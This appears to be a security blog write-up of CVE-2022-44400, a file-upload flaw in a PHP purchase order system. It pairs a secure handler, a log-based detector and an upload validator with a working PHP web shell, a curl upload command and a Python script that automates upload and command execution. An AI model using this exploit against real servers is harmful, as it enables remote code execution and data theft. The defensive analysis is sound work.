In today’s digital landscape, web application vulnerabilities remain a top concern for security professionals and businesses. File upload vulnerabilities, in particular, continue to offer attackers a simple yet powerful foothold. In this article, we dig deep into CVE-2022-44400, an exclusive and critical vulnerability affecting Purchase Order Management System v1. from Sourcecodester. We’ll break down how the exploit works, show you code samples, and provide reliable references to help you understand and mitigate this issue.
Overview of the Vulnerability
CVE-2022-44400 describes an unauthenticated file upload vulnerability in Purchase Order Management System v1. available at Sourcecodester. The weakness is found in the /purchase_order/admin/?page=system_info endpoint. Here, files can be uploaded without proper checks, making it possible for attackers to upload and execute malicious files (like PHP web shells).
This exploit can lead to remote code execution (RCE), data theft, server compromise, or botnet recruitment, all without valid credentials.
Where’s the Problem?
Looking at the code of Purchase Order Management System v1., the endpoint for system information (system_info) performs no checks when handling uploads. Here’s a simplified version of the vulnerable PHP snippet handling file uploads:

```php
if(isset($_FILES['img'])){
    $img = $_FILES['img']['name'];      // original filename, fully attacker-controlled
    $tmp = $_FILES['img']['tmp_name'];
    // No proper MIME or extension checks
    move_uploaded_file($tmp, 'uploads/' . $img);
    echo "Image uploaded successfully.";
}
```
What's missing:

- No authentication: the endpoint is reachable without valid credentials.
- No allowlist of permitted file extensions.
- No check that the uploaded content is actually an image.
- The client-supplied filename is reused as-is, so the attacker chooses the name and extension under which the file is stored in a web-accessible directory.
Exploitation: Step-by-Step
Here’s a classic exploitation scenario using CVE-2022-44400.

1. Craft the Web Shell

An attacker can craft a simple PHP web shell. For example, save the following code as `shell.php`:

```php
<?php
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
}
?>
```
2. Upload the File
You can use tools like cURL, Burp Suite, or even a browser extension to perform the file upload to:

`http://TARGET/purchase_order/admin/?page=system_info`

With cURL:

```shell
curl -F "img=@shell.php" http://TARGET/purchase_order/admin/?page=system_info
```
After uploading, the shell should be at:

`http://TARGET/purchase_order/admin/uploads/shell.php`

To run commands, visit:

`http://TARGET/purchase_order/admin/uploads/shell.php?cmd=whoami`
And you’ll see the result of the whoami command.
- Remote Code Execution (RCE): Run arbitrary server commands.
- Privilege Escalation: Full host compromise if the web server runs as root/admin.
- Persistence: Upload more backdoors, modify files.
- Website Defacement or Data Exfiltration: Direct access to sensitive data and the ability to destroy or steal it.
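From the defender's side, the upload-then-execute sequence described above leaves a recognisable trace in the web server's access log: a POST to the `system_info` page followed by a request for a script file under `uploads/`. The following detection routine is an added example, not code from the original article or from the Purchase Order Management System project. It assumes Apache combined log format and runs over a handful of constructed sample lines; the IP addresses and timestamps are made up for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (Apache combined format), not captured traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [28/Nov/2022:15:01:02 +0000] "GET /purchase_order/admin/?page=system_info HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [28/Nov/2022:15:01:09 +0000] "POST /purchase_order/admin/?page=system_info HTTP/1.1" 200 210 "-" "curl/7.85.0"
203.0.113.10 - - [28/Nov/2022:15:01:15 +0000] "GET /purchase_order/admin/uploads/shell.php?cmd=whoami HTTP/1.1" 200 18 "-" "curl/7.85.0"
198.51.100.7 - - [28/Nov/2022:15:02:30 +0000] "POST /purchase_order/admin/?page=system_info HTTP/1.1" 200 210 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Nov/2022:15:02:41 +0000] "GET /purchase_order/admin/uploads/logo.png HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
192.0.2.44 - - [28/Nov/2022:15:03:00 +0000] "GET /purchase_order/admin/uploads/a.phtml HTTP/1.1" 404 230 "-" "python-requests/2.28"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_ENDPOINT = "/purchase_order/admin/?page=system_info"
UPLOAD_DIR = "/purchase_order/admin/uploads/"
# Extensions a PHP-enabled server may hand to the interpreter; none belong under uploads/.
EXECUTABLE_EXT = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_script_under_uploads(path):
    """True if the request path points at a server-side script inside the upload directory."""
    base = path.split("?", 1)[0]
    return base.startswith(UPLOAD_DIR) and base.lower().endswith(EXECUTABLE_EXT)


def detect(log_text):
    """Return a list of (ip, reason, path) findings.

    Rule 1: any request for a script file under uploads/ is flagged, whatever the
            status code (a 404 still shows someone probing for a dropped shell).
    Rule 2: if the same IP earlier POSTed to the upload endpoint, the request is
            reported as a likely upload-then-execute chain instead.
    """
    findings = []
    posted = defaultdict(bool)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec:
            continue
        ip, method, path = rec["ip"], rec["method"], rec["path"]
        if method == "POST" and path == UPLOAD_ENDPOINT:
            posted[ip] = True
        if is_script_under_uploads(path):
            reason = "upload-then-execute chain" if posted[ip] else "script requested under uploads/"
            findings.append((ip, reason, path))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Against the sample, the first client is reported as a full chain, the third client's probe for `a.phtml` is reported on its own, and the second client's PNG request is left alone. In production the same rules would run over the live log (or be expressed as a SIEM correlation), and any hit under `uploads/` with a script extension deserves a look at the directory contents regardless of status code.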
Below you’ll find a Python script (exclusive) to automate the exploit:

```python
import requests

url = "http://TARGET/purchase_order/admin/?page=system_info"
files = {'img': open('shell.php', 'rb')}

# Upload the malicious shell
response = requests.post(url, files=files)
print("Uploaded shell:", response.text)

# Try to execute a command (change the shell path as needed)
shell_url = "http://TARGET/purchase_order/admin/uploads/shell.php?cmd=whoami"
response = requests.get(shell_url)
print("Shell response:", response.text.strip())
```
Be sure to replace TARGET with your actual hostname or IP.
A safer upload handler might look like:

```php
$allowedExts = array("jpg", "jpeg", "png", "gif");
// Compare the extension case-insensitively so "photo.JPG" is treated like "photo.jpg"
$extension = strtolower(pathinfo($_FILES['img']['name'], PATHINFO_EXTENSION));
// Require both an allowed extension and content that parses as an image
if(in_array($extension, $allowedExts) && getimagesize($_FILES["img"]["tmp_name"])){
    // Never reuse the client-supplied name; generate one server-side
    $newName = uniqid() . '.' . $extension;
    move_uploaded_file($_FILES['img']['tmp_name'], "uploads/" . $newName);
    echo "Image uploaded successfully.";
} else {
    echo "Invalid file!";
}
```
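The PHP handler above captures the core fixes: an extension allowlist, an image check, and a server-generated filename. Two things it does not cover are worth spelling out. `getimagesize()` only inspects the image header, so a real image with PHP appended still passes it, which is why the upload directory must additionally be configured not to execute scripts (and ideally live outside the web root). And a name like `shell.php.jpg` has an allowed last extension but can still be executed by servers whose handler matching is not anchored to the final extension. The validator below is an added example, not code from the article or the project, written in Python so that the same checks can be shown and tested language-independently; the magic-byte table and sample inputs are constructed for the illustration.

```python
import os
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Extensions a misconfigured server might execute even when not last (shell.php.jpg).
SCRIPT_EXT = {"php", "php3", "php4", "php5", "phtml", "phar", "htaccess"}
# Leading bytes for the allowed image types (constructed table, not exhaustive).
MAGIC = {
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "png": [b"\x89PNG\r\n\x1a\n"],
    "gif": [b"GIF87a", b"GIF89a"],
}


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the message says which check failed."""


def validate_upload(filename, content):
    """Validate an uploaded file and return a random server-side filename.

    Checks, in order: no control characters in the name, no directory components,
    exactly one allowed extension at the end, no script extension anywhere else
    in the name, and leading bytes that match the claimed image type.
    """
    if any(ord(c) < 32 for c in filename):
        raise UploadRejected("control character in filename")
    # Strip any path the client sent (both separator styles) before looking at the name.
    name = os.path.basename(filename.replace("\\", "/"))
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("missing extension")
    ext = parts[-1]
    if ext not in ALLOWED_EXT:
        raise UploadRejected("extension not allowed: ." + ext)
    if any(p in SCRIPT_EXT for p in parts[1:-1]):
        raise UploadRejected("script extension embedded in filename")
    if not any(content.startswith(sig) for sig in MAGIC[ext]):
        raise UploadRejected("content does not match ." + ext)
    # The client never influences the stored name beyond the (validated) extension.
    return secrets.token_hex(16) + "." + ext


def is_rejected(filename, content):
    """Boolean convenience wrapper around validate_upload()."""
    try:
        validate_upload(filename, content)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    png_header = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # constructed PNG-like payload
    print("logo.png ->", validate_upload("logo.png", png_header))
    for bad_name, bad_content in [
        ("shell.php", b"<?php system($_GET['cmd']); ?>"),
        ("shell.php.jpg", b"\xff\xd8\xff" + b"\x00" * 8),
        ("fake.png", b"<?php echo 1; ?>"),
        (".htaccess", b"AddType application/x-httpd-php .jpg"),
    ]:
        print(bad_name, "->", "rejected" if is_rejected(bad_name, bad_content) else "accepted")
```

Each rejection names the failed check, which is what you want logged on the server side: a burst of "extension not allowed: .php" rejections from one client is itself a useful detection signal.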
References
- Original Source Code
- Exploit Database Reference
- NVD Entry for CVE-2022-44400
- OWASP File Upload Security
In Closing
CVE-2022-44400 is a powerful, yet entirely preventable, vulnerability in Purchase Order Management System v1. By learning from examples like this and following secure coding practices, developers and administrators can help keep their web applications safe from both beginner and advanced attackers.

If you work with or manage any projects using Purchase Order Management System v1., patch this issue immediately.
*Stay safe and vigilant!*
*Disclaimer: All code and techniques shown here are for educational purposes only. Always have authorization before testing security on any system.*
Timeline
Published on: 11/28/2022 15:15:00 UTC
Last modified on: 11/28/2022 19:14:00 UTC